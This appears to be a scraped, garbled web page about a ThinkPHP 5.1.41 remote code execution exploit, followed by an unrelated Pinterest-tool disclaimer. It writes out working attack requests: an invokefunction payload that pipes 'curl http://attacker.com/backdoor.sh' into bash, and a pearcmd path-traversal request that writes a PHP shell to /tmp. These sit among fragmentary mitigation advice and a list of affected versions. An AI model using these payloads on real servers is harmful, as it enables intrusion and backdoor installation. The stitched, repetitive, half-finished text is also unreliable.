Thinkphp V5.1.41 Exploit [verified]

Use regex to block:

GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=FFI::cdef("int system(const char *cmd);")->system("curl http://attacker.com/backdoor.sh | bash") thinkphp v5.1.41 exploit

Use a WAF with specific rulesets for ThinkPHP to catch _method injection attempts and common RCE keywords. php file where this vulnerability originated? Use regex to block: GET /index

If you are running in production right now, stop reading and patch immediately. The exploit is trivial, the payloads are weaponized, and the attackers are already scanning your IP. the payloads are weaponized

GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/shell.php Use code with caution. Copied to clipboard Affected Versions ThinkPHP 5.1.x: v5.1.0 to v5.1.41. ThinkPHP 6.0.x: v6.0.0 to v6.0.13. ThinkPHP 5.0.x: v5.0.0 to v5.0.24. Remediation Steps Immediate Mitigation:

: This sets the framework's internal data processing filter to the PHP system() function.

Disclaimer: PinBoardSaver.com is not affiliated, associated, authorized, endorsed by, or in any way officially connected with Pinterest, or any of their subsidiaries or affiliates. The name Pinterest® as well as related names, marks, logos, emblems, and images are registered trademarks of their respective owners. The use of any trade name or trademark is for identification and reference purposes only and does not imply any association with the trademark holder of their product brand.